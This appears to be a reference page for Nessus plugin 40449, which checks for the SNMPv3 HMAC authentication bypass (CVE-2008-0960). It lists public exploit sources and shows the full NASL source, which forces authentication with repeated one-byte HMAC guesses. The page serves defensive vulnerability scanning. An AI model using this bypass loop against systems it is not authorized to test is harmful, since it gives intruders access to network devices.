Multiple Vendor HMAC Authentication SNMPv3 Authentication Bypass - Nessus

Critical   Plugin ID: 40449

---

This page contains detailed information about the Multiple Vendor HMAC Authentication SNMPv3 Authentication Bypass Nessus plugin including available exploits and PoCs found on GitHub, in Metasploit or Exploit-DB for verifying of this vulnerability.

Plugin Overview

---

ID: 40449
Name: Multiple Vendor HMAC Authentication SNMPv3 Authentication Bypass
Filename: snmpv3_authentication_bypass.nasl
Vulnerability Published: 2008-05-31
This Plugin Published: 2009-07-31
Last Modification Time: 2022-02-28
Plugin Version: 1.25
Plugin Type: remote
Plugin Family: SNMP
Dependencies: find_service2.nasl
Required KB Items [?]: SNMP/v3/Supported, SNMP/v3/username

Vulnerability Information

---

Severity: Critical
Vulnerability Published: 2008-05-31
Patch Published: 2008-06-09
CVE [?]: CVE-2008-0960
CPE [?]: N/A

Synopsis

The SNMP server running on this host is affected by an authentication bypass vulnerability.

Description

SNMPv3 HMAC verification relies on the client to specify the HMAC length. This makes it possible for remote attackers to bypass SNMP authentication via repeated attempts with a HMAC length value of 1, which causes only the first byte of the authentication hash to be checked.

This issue affects SNMP implementations from multiple vendors.

Solution

This vulnerability affects multiple products from multiple vendors. Check with your vendor for the appropriate solution.

Public Exploits

---

Target Network Port(s): N/A
Target Asset(s): N/A
Exploit Available: True (Exploit-DB, GitHub, Immunity Canvas)
Exploit Ease: Exploits are available

Here's the list of publicly known exploits and PoCs for verifying the Multiple Vendor HMAC Authentication SNMPv3 Authentication Bypass vulnerability:

1. Exploit-DB: exploits/multiple/remote/5790.txt
   [EDB-5790: SNMPv3 - HMAC Validation error Remote Authentication Bypass]
2. GitHub: https://github.com/offensive-security/exploitdb-bin-sploits/blob/master/bin-sploits/5790.tgz
   [EDB-5790]
3. Immunity Canvas: D2ExploitPack

Before running any exploit against any system, make sure you are authorized by the owner of the target system(s) to perform such activity. In any other case, this would be considered as an illegal activity.

WARNING: Beware of using unverified exploits from sources such as GitHub or Exploit-DB. These exploits and PoCs could contain malware. For more information, see how to use exploits safely.

Risk Information

---

CVSS Score Source [?]: CVE-2008-0960
CVSS V2 Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C/E:F/RL:OF/RC:C

CVSS Base Score:	10.0 (High)
Impact Subscore:	10.0
Exploitability Subscore:	10.0
CVSS Temporal Score:	8.3 (High)
CVSS Environmental Score:	NA (None)
Modified Impact Subscore:	NA
Overall CVSS Score:	8.3 (High)

CVSS V3 Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:F/RL:O/RC:C

CVSS Base Score:	9.8 (Critical)
Impact Subscore:	5.9
Exploitability Subscore:	3.9
CVSS Temporal Score:	9.1 (Critical)
CVSS Environmental Score:	NA (None)
Modified Impact Subscore:	NA
Overall CVSS Score:	9.1 (Critical)

Go back to menu.

Plugin Source

---

This is the snmpv3_authentication_bypass.nasl nessus plugin source code. This script is Copyright (C) 2009-2022 Tenable Network Security, Inc.

#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#

include('deprecated_nasl_level.inc');
include("compat.inc");

if (description)
{
  script_id(40449);
  script_version("1.25");
  script_set_attribute(attribute:"plugin_modification_date", value:"2022/02/28");

  script_cve_id("CVE-2008-0960");
  script_bugtraq_id(29623);
  script_xref(name:"CERT", value:"878044");
  script_xref(name:"EDB-ID", value:"5790");

  script_name(english:"Multiple Vendor HMAC Authentication SNMPv3 Authentication Bypass");
  script_summary(english:'Makes repeated attempts to authenticate with a single character authentication hash.' );

  script_set_attribute(attribute:'synopsis', value:
"The SNMP server running on this host is affected by an authentication
bypass vulnerability.");
  script_set_attribute(attribute:'description', value:
"SNMPv3 HMAC verification relies on the client to specify the HMAC
length.  This makes it possible for remote attackers to bypass SNMP
authentication via repeated attempts with a HMAC length value of 1,
which causes only the first byte of the authentication hash to be
checked. 

This issue affects SNMP implementations from multiple vendors.");
  script_set_attribute(attribute:'see_also', value:'http://sourceforge.net/forum/forum.php?forum_id=833770');
  script_set_attribute( attribute:'solution', value:
"This vulnerability affects multiple products from multiple vendors. 
Check with your vendor for the appropriate solution.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2008-0960");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:F/RL:O/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"exploit_framework_canvas", value:"true");
  script_set_attribute(attribute:"canvas_package", value:'D2ExploitPack');
  script_cwe_id(287);

  script_set_attribute(attribute:'vuln_publication_date', value:'2008/05/31');
  script_set_attribute(attribute:'patch_publication_date', value:'2008/06/09');
  script_set_attribute(attribute:'plugin_publication_date', value:'2009/07/31');

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"exploited_by_nessus", value:"true");
  script_end_attributes();

  script_category(ACT_ATTACK);
  script_family(english:'SNMP');

  script_copyright(english:"This script is Copyright (C) 2009-2022 Tenable Network Security, Inc.");

  script_dependencies('find_service2.nasl');
  script_require_keys('SNMP/v3/username', 'SNMP/v3/Supported');
  exit(0);
}

include("global_settings.inc");
include ("misc_func.inc");
include ("snmp_func.inc");

v3_supported = get_kb_item( 'SNMP/v3/Supported' );
if  ( ! v3_supported )
  exit( 0, 'SNMPv3 is not supported.' );

username = get_kb_item( 'SNMP/v3/username' );
if  ( ! username )
  exit( 1, 'No SNMPv3 username specified.' );

port = get_kb_item("SNMP/port");
if  ( !port )
    port = 161;
if (! get_udp_port_state(port)) exit(0, "UDP port "+port+" is not open.");

function snmp_no_auth_validation_reply( socket, timeout )
{
  local_var seq, res, pdu, error, oid, ret, rep, id, cmpt, vers, tmp;
  local_var msg_flags, msg_auth_priv_params, response_data_index;

  cmpt = 5;

  while (cmpt)
  {
    rep = recv(socket:socket, length:4096, timeout:timeout);
    if (!rep)
      return NULL;

    # First decode snmp reply (sequence)
    seq = ber_get_sequence (seq:rep);

    if (isnull(seq) || (seq[0] != 4) )
      return NULL;

    tmp = ber_get_sequence( seq:seq[ 4 ] );

    # Check if Response PDU is 2
    pdu = ber_get_response_pdu( pdu:tmp[ 3 ] );

    if (isnull(pdu) || (pdu[0] != 4))
      return NULL;

    id = ber_get_int (i:pdu[1]);

    if ( !isnull(id) && ( ( id == (snmp_request_id - 1) ) || id == 0 ) )
    {
      # Check if Error == NO ERROR
      error = ber_get_int (i:pdu[2]);
      if (isnull(error) || (error != 0))
        return NULL;

      # Extract response
      seq = ber_get_sequence (seq:pdu[4]);
      if (isnull(seq) || (seq[0] != 1))
        return NULL;

      seq = ber_get_sequence (seq:seq[1]);
      if (isnull(seq) || (seq[0] != 2))
        return NULL;

      oid = ber_get_oid (oid:seq[1]);
      res = snmp_extract_reply (rep:seq[2]);

      if ( isnull( oid ) )
        return NULL;

      ret = make_list();
      ret[0] = oid;
      ret[1] = res;

      return ret;
    }
    cmpt--;
  }
}

rep = NULL;
tries = 0;

soc = open_sock_udp(port);
if ( !soc )
  exit ( 1, 'Socket failure.' );

# Set the common values
set_snmp_version( version:3 );
msg_id = rand();

# Get the authoritative engine ID
if( ( ! auth_engine_id ) || ( ! auth_engine_boots  ) || ( !  auth_engine_time  ) )
{
  msg_flags = raw_string( MSG_REPORTABLE_FLAG );
  msg_global_data = snmpv3_put_msg_global_data( msg_max_size:MSG_MAX_SIZE,
                                                msg_flags:msg_flags,
                                                msg_security_model:USM_SECURITY_MODEL );
  snmpv3_connected = snmpv3_initial_request( socket:soc, msg_global_data:msg_global_data, timeout:2 );
  if ( ! snmpv3_connected )
    exit(1, "SNMPv3 request failed");
}

# Set the static parts of the auth attempt
packed_version = ber_put_int( i:SNMP_VERSION );
msg_flags = raw_string( MSG_REPORTABLE_FLAG | MSG_AUTHENTICATED_FLAG );
auth_data = snmp_assemble_authentication_data( auth_engine_data:snmp_put_engine_data(),
                                                                msg_user_name:username,
                                                                msg_auth_param:'T',
                                                                msg_priv_param:NULL );

# Construct request for SysDesc OID.
sequence = ber_put_sequence( seq:make_list( ber_put_oid( oid:'1.3.6.1.2.1.1.1.0' ), ber_put_null() ) );

while( tries < 512 )
{
  tries++;
  msg_global_data = snmpv3_put_msg_global_data( msg_max_size:MSG_MAX_SIZE,
                                                msg_flags:msg_flags,
                                                msg_security_model:USM_SECURITY_MODEL );
  snmp_header = raw_string( packed_version, msg_global_data, auth_data );
  req = snmp_assemble_request_data( seq:sequence, op:BER_OP_GET_REQUEST );
  whole_msg = ber_put_sequence( seq:make_list( snmp_header, req ) );

  send( socket:soc, data:whole_msg );
  rep = snmp_no_auth_validation_reply( socket:soc, timeout:2 );

  if  ( isnull( rep ) )
    exit( 1, 'Unexpected response.' );
  else if ( rep[ 0 ] == USM_STATS_WRONG_DIGESTS )
    continue;
  else if ( rep[ 0 ] == USM_STATS_UNKNOWN_USER_NAMES )
    exit( 0, 'Not a valid SNMPv3 username for this host' );
  else if ( rep[ 0 ] == '1.3.6.1.2.1.1.1.0' )
    break;
  else
    exit( 1, 'Unexpected response.' );
}

reset_snmp_version();

if  ( rep[ 0 ] == '1.3.6.1.2.1.1.1.0' )
{
  if  ( report_verbosity > 0 )
  {
    report = '\n' + 'Nessus was able to force authorized access after ' + tries +
             ' attempts.\n\n' + 'The request for the system description returned :\n'
             + '\n' + rep[ 1 ] +'\n';

    security_hole( port:port, proto:'udp', extra:report );
  }
  else security_hole( port:port, proto:'udp' );
}
else
  exit( 0, 'Nessus couldn\'t find any vulnerable installs.' );

The latest version of this script can be found in these locations depending on your platform:

• Linux / Unix:
  /opt/nessus/lib/nessus/plugins/snmpv3_authentication_bypass.nasl
• Windows:
  C:\ProgramData\Tenable\Nessus\nessus\plugins\snmpv3_authentication_bypass.nasl
• Mac OS X:
  /Library/Nessus/run/lib/nessus/plugins/snmpv3_authentication_bypass.nasl

Go back to menu.

How to Run

---

Here is how to run the Multiple Vendor HMAC Authentication SNMPv3 Authentication Bypass as a standalone plugin via the Nessus web user interface (https://localhost:8834/):

1. Click to start a New Scan.
2. Select Advanced Scan.
3. Navigate to the Plugins tab.
4. On the top right corner click to Disable All plugins.
5. On the left side table select SNMP plugin family.
6. On the right side table select Multiple Vendor HMAC Authentication SNMPv3 Authentication Bypass plugin ID 40449.
7. Specify the target on the Settings tab and click to Save the scan.
8. Run the scan.

Here are a few examples of how to run the plugin in the command line. Note that the examples below demonstrate the usage on the Linux / Unix platform.

Basic usage:

/opt/nessus/bin/nasl snmpv3_authentication_bypass.nasl -t <IP/HOST>

Run the plugin with audit trail message on the console:

/opt/nessus/bin/nasl -a snmpv3_authentication_bypass.nasl -t <IP/HOST>

Run the plugin with trace script execution written to the console (useful for debugging):

/opt/nessus/bin/nasl -T - snmpv3_authentication_bypass.nasl -t <IP/HOST>

Run the plugin with using a state file for the target and updating it (useful for running multiple plugins on the target):

/opt/nessus/bin/nasl -K /tmp/state snmpv3_authentication_bypass.nasl -t <IP/HOST>

Go back to menu.

References

---

BID | SecurityFocus Bugtraq ID:

• 29623

CERT | Computer Emergency Response Team:

• 878044

CWE | Common Weakness Enumeration:

• CWE-287 (Weakness) Improper Authentication

See also:

• https://www.tenable.com/plugins/nessus/40449
• http://sourceforge.net/forum/forum.php?forum_id=833770
• https://vulners.com/nessus/SNMPV3_AUTHENTICATION_BYPASS.NASL

Similar and related Nessus plugins:

• 33142 - CentOS 3 / 4 / 5 : net-snmp (CESA-2008:0529)
• 49016 - SNMP Version 3 Authentication Vulnerabilities (cisco-sa-20080610-snmpv3)
• 71433 - SNMP Version 3 Authentication Vulnerabilities (cisco-sa-20080610-snmpv3)
• 66697 - SNMP Version 3 Authentication Bypass Vulnerabilities (cisco-sa-20080610-snmpv3)
• 34720 - Debian DSA-1663-1 : net-snmp - several vulnerabilities
• 78225 - F5 Networks BIG-IP : SNMPv3 HMAC verification vulnerability (SOL8939)
• 33146 - Fedora 9 : net-snmp-5.4.1-18.fc9 (2008-5215)
• 33147 - Fedora 8 : net-snmp-5.4.1-7.fc8 (2008-5218)
• 33148 - Fedora 7 : net-snmp-5.4-18.fc7 (2008-5224)
• 33832 - GLSA-200808-02 : Net-SNMP: Multiple vulnerabilities
• 47753 - HP-UX PHSS_39886 : HP OpenView SNMP Emanate Master Agent Remote Unauthorized Access (HPSBMA02439 SSRT080082 rev.3)
• 47754 - HP-UX PHSS_39887 : HP OpenView SNMP Emanate Master Agent Remote Unauthorized Access (HPSBMA02439 SSRT080082 rev.3)
• 33281 - Mac OS X 10.5.x < 10.5.4 Multiple Vulnerabilities
• 33282 - Mac OS X Multiple Vulnerabilities (Security Update 2008-004)
• 37050 - Mandriva Linux Security Advisory : net-snmp (MDVSA-2008:118)
• 127171 - NewStart CGSL MAIN 5.04 : net-snmp Multiple Vulnerabilities (NS-SA-2019-0017)
• 67708 - Oracle Linux 3 / 4 / 5 : net-snmp (ELSA-2008-0529)
• 33156 - RHEL 2.1 : ucd-snmp (RHSA-2008:0528)
• 33157 - RHEL 3 / 4 / 5 : net-snmp (RHSA-2008:0529)
• 60419 - Scientific Linux Security Update : net-snmp on SL3.x, SL4.x, SL5.x i386/x86_64
• 33752 - Slackware 12.0 / 12.1 / current : net-snmp (SSA:2008-210-07)
• 107359 - Solaris 10 (sparc) : 120272-31
• 25272 - Solaris 10 (sparc) : 120272-40 (deprecated)
• 107861 - Solaris 10 (x86) : 120273-33
• 25391 - Solaris 10 (x86) : 120273-42 (deprecated)
• 40045 - openSUSE Security Update : libsnmp15 (libsnmp15-87)
• 41223 - SuSE9 Security Update : net-snmp (YOU Patch Number 12204)
• 33786 - openSUSE 10 Security Update : libsnmp15 (libsnmp15-5418)
• 33787 - SuSE 10 Security Update : net-snmp (ZYPP Patch Number 5422)
• 38099 - Ubuntu 6.06 LTS / 7.10 / 8.04 LTS / 8.10 : net-snmp vulnerabilities (USN-685-1)
• 40381 - VMSA-2008-0013 : Updated ESX packages for OpenSSL, net-snmp, perl
• 40384 - VMSA-2008-0017 : Updated ESX packages for libxml2, ucd-snmp, libtiff

Version

---

This page has been produced using Nessus Professional 10.1.2 (#68) LINUX, Plugin set 202205072148.
Plugin file snmpv3_authentication_bypass.nasl version 1.25. For more plugins, visit the Nessus Plugin Library.

Go back to menu.